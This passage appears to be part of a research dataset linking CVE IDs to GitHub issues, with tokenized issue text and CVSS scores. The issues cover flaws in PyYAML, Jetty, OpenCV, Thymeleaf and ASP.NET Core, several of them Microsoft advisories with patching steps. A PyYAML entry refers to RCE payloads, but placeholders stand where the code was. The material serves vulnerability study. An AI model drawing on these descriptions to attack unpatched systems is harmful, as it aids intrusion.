        "description": "Investigate Ubuntu libxslt patches in USN NUMBERTAG and USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG URLTAG FILETAG PATHTAG CVETAG .html Summary (kept up to date): Next steps: investigate the medium CVE and upstream commits and determine if the patches have already been applied and if not, whether we should include them in the Nokogiri vendored distribution of libxslt.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16865",
        "Issue_Url_old": "https://github.com/python-pillow/Pillow/issues/4123",
        "Issue_Url_new": "https://github.com/python-pillow/pillow/issues/4123",
        "Repo_new": "python-pillow/pillow",
        "Issue_Created_At": "2019-10-07T14:09:34Z",
        "description": "Question regarding CVETAG . Hi, I am looking at CVETAG NUMBERTAG reported against the new NUMBERTAG release, but the information about it is quite limited and I could not find a specific mention in git log. In addition the Changelog does not seem to mention anything specifically security related. Would it be possible to elaborate a bit about the issue and maybe point to a commit fixing the issue ? Thanks in advance NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2014-1938",
        "Issue_Url_old": "https://github.com/alex/rply/issues/42",
        "Issue_Url_new": "https://github.com/alex/rply/issues/42",
        "Repo_new": "alex/rply",
        "Issue_Created_At": "2015-09-01T04:42:03Z",
        "description": "CVETAG : still uses /tmp insecurely (forwarding from Debian BTS NUMBERTAG Hello, There has been a security issue reported at Debian against rply. This issue is more than a year old. Can this be fixed by upstream?. CVETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-14343",
        "Issue_Url_old": "https://github.com/yaml/pyyaml/issues/420",
        "Issue_Url_new": "https://github.com/yaml/pyyaml/issues/420",
        "Repo_new": "yaml/pyyaml",
        "Issue_Created_At": "2020-07-22T08:18:35Z",
        "description": "APITAG and APITAG still vulnerable to fairly trivial RCE. As of NUMBERTAG APITAG defaults to using APITAG and APITAG is still vulnerable to fairly trivial RCE. Some example payloads: APITAG APITAG CODETAG I do not believe this is entirely fixable unless APITAG finally decided to use secure defaults, and make APITAG equivalent to APITAG APITAG should probably be removed entirely, as I don't see the purpose of it.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-5063",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/16951",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/16951",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2020-04-02T04:40:24Z",
        "description": "null pointer dereference and buffer overflow: APITAG NUMBERTAG System information (version) APITAG NUMBERTAG Operating System / Platform => Win NUMBERTAG Detailed description There appear to be several places where a nullptr dereference can occur in core(persistence). These have been listed as security vulnerabilities in URLTAG It appears they were fixed in APITAG but not in APITAG NUMBERTAG see issue URLTAG and pull request URLTAG Similarly, another security bug is listed here URLTAG where a buffer overflow can occur. It appears that URLTAG fixes all locations where buffer overflow can happen in master, but in the NUMBERTAG branch and in NUMBERTAG releases, the fixes were not added (ie URLTAG in NUMBERTAG s URLTAG in master) As these are both bugs, can we have these fixes back ported to Open C NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44549",
        "Issue_Url_old": "https://github.com/eclipse-ee4j/mail/issues/429",
        "Issue_Url_new": "https://github.com/jakartaee/mail-api/issues/429",
        "Repo_new": "jakartaee/mail-api",
        "Issue_Created_At": "2020-03-13T08:49:10Z",
        "description": "Hostname validation for certificates should be enabled by default. APITAG NUMBERTAG specifications has hostname validation of certificates disabled by default NUMBERTAG This is a very insecure default configuration, and opposite to what would be expected as a default. As part of Jakarta Mail NUMBERTAG this should be changed to be secure by default NUMBERTAG APITAG defaults to false",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-43466",
        "Issue_Url_old": "https://github.com/thymeleaf/thymeleaf-spring/issues/263",
        "Issue_Url_new": "https://github.com/thymeleaf/thymeleaf-spring/issues/263",
        "Repo_new": "thymeleaf/thymeleaf-spring",
        "Issue_Created_At": "2021-11-10T17:39:51Z",
        "description": "High vulnerability issue 'thymeleaf spring5' dependency JAR. Version of Thymeleaf : FILETAG Environment: Spring Boot NUMBERTAG Detailed steps to reproduce your issue: Veracode APITAG Composition Analysis' finds below given High vulnerability issue in all versions of 'thymeleaf spring5' dependency Jars. Any possible workarounds you may have found No High Severity CVETAG URLTAG Template Injection: thymeleaf spring5 is vulnerable to template injection. An attacker can inject malicious input through the render function in APITAG , leading to remote code execution. Can you please look into it ?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17572",
        "Issue_Url_old": "https://github.com/apache/rocketmq/issues/1637",
        "Issue_Url_new": "https://github.com/apache/rocketmq/issues/1637",
        "Repo_new": "apache/rocketmq",
        "Issue_Created_At": "2019-12-04T13:17:26Z",
        "description": "APITAG \u6d4b\u8bd5\u73af\u5883\u6761\u4ef6\uff1a APITAG APITAG NUMBERTAG Windows7 pro NUMBERTAG APITAG NUMBERTAG PATHTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-22950",
        "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/28257",
        "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/28257",
        "Repo_new": "spring-projects/spring-framework",
        "Issue_Created_At": "2022-03-31T08:32:25Z",
        "description": "Improve diagnostics in APITAG for large array creation. Backport of gh NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-22950",
        "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/28145",
        "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/28145",
        "Repo_new": "spring-projects/spring-framework",
        "Issue_Created_At": "2022-03-08T15:53:04Z",
        "description": "Improve diagnostics in APITAG for large array creation. Attempting to create a large array in a APITAG expression can result in an ERRORTAG . Although the JVM recovers from that, we should throw an exception with a meaningful error message in order to improve diagnostics for the user.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-5007",
        "Issue_Url_old": "https://github.com/spring-projects/spring-security/issues/3964",
        "Issue_Url_new": "https://github.com/spring-projects/spring-security/issues/3964",
        "Repo_new": "spring-projects/spring-security",
        "Issue_Created_At": "2016-07-06T20:46:57Z",
        "description": "Add APITAG We should support a request matcher that integrates with Spring MVC",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17638",
        "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/4936",
        "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/4936",
        "Repo_new": "eclipse/jetty.project",
        "Issue_Created_At": "2020-06-03T14:33:35Z",
        "description": "Response header overflow leads to buffer corruptions in embedded Jetty. Jetty version APITAG (but traced it back to APITAG ) Java version ERRORTAG OS type/version APITAG Description We run several Spring Boot NUMBERTAG applications, originally deployed as WAR files on a standalone Jetty server ( APITAG ). Recently we changed these to use an embedded Jetty server, which included an upgrade to Jetty APITAG . Subsequently, we intermittently observed errors in one of our applications, serving an admin page using webjars. The logs indicated errors such as: ERRORTAG This was a valid request from the client side, but somehow the HTTP method got corrupted. ERRORTAG Truncated this one, see below for an example of a stacktrace. ERRORTAG ERRORTAG The admin page itself would also become highly unresponsive, and some files would fail to be served. A restart of the application would fix the errors, but it would also resolve itself \"eventually\". Moreover, the errors' frequency grew with load, but we couldn't reproduce it consistently. This application in particular was affected the most, but we also observed the errors in other applications. We managed to reproduce the issue by creating an endpoint in which we would explicitly send a response header larger than the configured maximum size ( APITAG ), after which an application would immediately become unresponsive and all aforementioned errors would start appearing. We confirmed this behavior wasn't present in our previous Jetty version APITAG , and found it was first introduced in APITAG . APITAG related to URLTAG This might also be the same issue as observed in URLTAG but APITAG which included the potential fix didn't resolve the issue for us. We have for now resolved this internally by allowing bigger response headers, as we do have a use case for these internally. I have provided below a test that can be used to trigger the behavior. It consists of sending a (too) large response header, after which we concurrently trigger many requests in order to reproduce the behavior. From my testing concurrency is necessary, which could explain why the error was more frequently observed in our webpage (it serves many webjars separately rather than bundling). Lastly, from my brief foray into exploring this issue, in one of the cases I noticed that when the header overflow was triggered, which released the APITAG buffer (but before any error handling was done), this same buffer was used by APITAG , but its limit was set to NUMBERTAG These are two different requests, and could explain the HTTP method corruption for instance. So it seems that somehow the buffer cleanup in case of a header overflow is perhaps not correctly handled. If you need any more information, please do let me know. Example test Please look at the logs to observe the triggered errors. Further below I have also provided some sample stacktraces that can be reproduced by this test. ERRORTAG Example stacktraces ERRORTAG ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
        "severity": "CRITICAL",
        "baseScore": 9.4,
        "impactScore": 5.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10782",
        "Issue_Url_old": "https://github.com/checkstyle/checkstyle/issues/7468",
        "Issue_Url_new": "https://github.com/checkstyle/checkstyle/issues/7468",
        "Repo_new": "checkstyle/checkstyle",
        "Issue_Created_At": "2020-01-13T17:42:15Z",
        "description": "Sonar violation: Disable XML external entity (XXE) processing. URLTAG Vulnerability at FILETAG Disable XML external entity (XXE) processing. Reply from Security expert: > Hi Roman, The next line APITAG does disable the loading of external entities when the system property is not configured by the user. URLTAG I would validate that you are using all of the prevention methods suggested in this document here: FILETAG The cases you need to be concerned with are any involving the use of the APITAG If you find any cases you are missing, then you may be vulnerable. In which case, please let me know. Cheers, Jonathan Leitschuh TODO: We need to investigate this to make sure if we are vulnerable",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-10753",
        "Issue_Url_old": "https://github.com/diffplug/spotless/issues/360",
        "Issue_Url_new": "https://github.com/diffplug/spotless/issues/360",
        "Repo_new": "diffplug/spotless",
        "Issue_Created_At": "2019-02-15T21:29:22Z",
        "description": "FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JAR files were compromised, any developers using these could continue to be infected past updating to fix this. URLTAG URLTAG URLTAG This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical; POC code exists already to maliciously compromise jar file inflight. See: URLTAG URLTAG To fix: We need to update our APITAG so that artifacts are resolved over HTTPS instead of HTTP. I've been finding this vulnerability in a lot of places today and have responsibly disclosed it to some of the larger organizations involved: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-12197",
        "Issue_Url_old": "https://github.com/kohsuke/libpam4j/issues/18",
        "Issue_Url_new": "https://github.com/kohsuke/libpam4j/issues/18",
        "Repo_new": "kohsuke/libpam4j",
        "Issue_Created_At": "2017-06-05T22:05:38Z",
        "description": "libpam4j authenticates invalid accounts. Currently, the call to pam_acct_mgmt is commented out in APITAG Thus any login restrictions configured via PAM account modules are ignored by APITAG This usually affects, among others, settings in PATHTAG (pam_access), /etc/nologin (pam_nologin) and host/service name authorization of pam_ldap. Any return value other than PAM_SUCCESS from pam_acct_mgmt should prevent a successful authentication.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-1723",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/170",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/170",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2021-01-12T18:19:41Z",
        "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core and ASP.NET NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists in the way Kestrel parses HTTP NUMBERTAG requests. The security update addresses the vulnerability by fixing the way the Kestrel parses HTTP NUMBERTAG requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or .NET NUMBERTAG application running on .NET Core NUMBERTAG or .NET NUMBERTAG or lower respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG If you are using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you are using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-0603",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/403",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/403",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2020-01-14T18:01:38Z",
        "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in ASP.NET Core software when the software fails to handle objects in memory. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles in memory. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you are exposed to the vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I fix the issue? First examine the versions of .NET Core you have installed. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG APITAG APITAG Updated runtimes and SDKs For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have multiple runtimes or SDKs installed, you must update all runtimes or SDKs separately. Once you've installed the updated runtime or SDK, restart your apps for the update to take effect. Applications targeting .NET Core runtime Update your runtime and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks then restart your application. Applications targeting .NET Framework First update your .NET Core runtimes and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks . As targeting .NET Framework adds dependencies for various packages you must update the dependencies your application uses, recompile and redeploy your application. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: v Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Brennan Conroy of Microsoft Corporation External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-0564",
        "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/334",
        "Issue_Url_new": "https://github.com/aspnet/announcements/issues/334",
        "Repo_new": "aspnet/announcements",
        "Issue_Created_At": "2019-01-08T18:04:59Z",
        "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG or APITAG The vulnerable packages affected software are distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG or the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. Applications not using APITAG or APITAG Some of the affected assemblies are also available separately as a APITAG package. If you are not using APITAG or APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG APITAG and APITAG If your host version is a NUMBERTAG host, you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual 